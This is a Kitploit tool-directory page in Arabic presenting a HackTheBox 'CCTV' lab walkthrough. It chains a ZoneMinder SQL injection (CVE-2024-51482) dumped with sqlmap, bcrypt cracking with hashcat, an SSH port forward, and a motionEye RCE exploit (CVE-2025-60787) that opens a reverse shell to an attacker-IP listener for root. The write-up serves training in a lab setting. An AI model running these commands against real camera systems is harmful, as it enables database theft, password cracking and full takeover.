Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ledksv/cctv
كسر كلمات المرورتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubledksv/cctv

cctv

HackTheBox CCTV walkthrough يربط بين CVE-2024-51482 ZoneMinder SQL injection، وكسر bcrypt hash، وCVE-2025-60787 motionEye RCE للحصول على root.

منذ 10س 51دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CCTV — جولة HackTheBox

المنصة: HackTheBox | نظام التشغيل: Linux

سلسلة الهجوم

حقن SQL في ZoneMinder عبر CVE-2024-51482 يستخرج تجزئة bcrypt من قاعدة البيانات. كسرها باستخدام hashcat يمنح وصول SSH. نسخة motionEye الداخلية المكشوفة عبر إعادة توجيه المنافذ معرّضة لـ CVE-2025-60787 — تمنح صدفة root.

الاستطلاع

root@kitploit:~
nmap -sV -sC 10.129.53.160 -Pn

22/tcp open  ssh     OpenSSH 9.6p1 (Ubuntu)
80/tcp open  http    Apache 2.4.58 — SecureVision CCTV & Security Solutions

تمت إضافة cctv.htb إلى /etc/hosts. استضاف المنفذ 80 تثبيت ZoneMinder.

CVE-2024-51482 — حقن SQL في ZoneMinder

CVE-2024-51482 هو ثغرة حقن SQL في نقطة نهاية تسجيل الدخول في ZoneMinder. معامل اسم المستخدم غير مُعقّم، مما يسمح باستخراج قاعدة البيانات.

root@kitploit:~
sqlmap -u "http://cctv.htb/zm/index.php" \
  --data="username=admin&password=admin&action=login" \
  --dbms=mysql --dump --batch

تم استخراج تجزئة كلمة مرور bcrypt من جدول المستخدمين.

كسر التجزئة

root@kitploit:~
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

تم كسر كلمة المرور.

نقطة ارتكاز SSH

root@kitploit:~
ssh <user>@10.129.53.160

تم استرجاع علم المستخدم. تم التحقق من الخدمات الداخلية.

root@kitploit:~
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel

تم إعادة توجيه المنفذ.

root@kitploit:~
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160

CVE-2025-60787 — تنفيذ أوامر عن بُعد في motionEye

CVE-2025-60787 هو تنفيذ أوامر عن بُعد مُصادق عليه في motionEye. مع الوصول إلى اللوحة الداخلية، تُنفَّذ أوامر عشوائية بصلاحيات root.

root@kitploit:~
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444

تم الحصول على صدفة root. علم root في /root/root.txt.


لأغراض تعليمية فقط. اختبر فقط الأنظمة التي تملكها أو لديك إذن صريح باختبارها.

تنزيل الأداة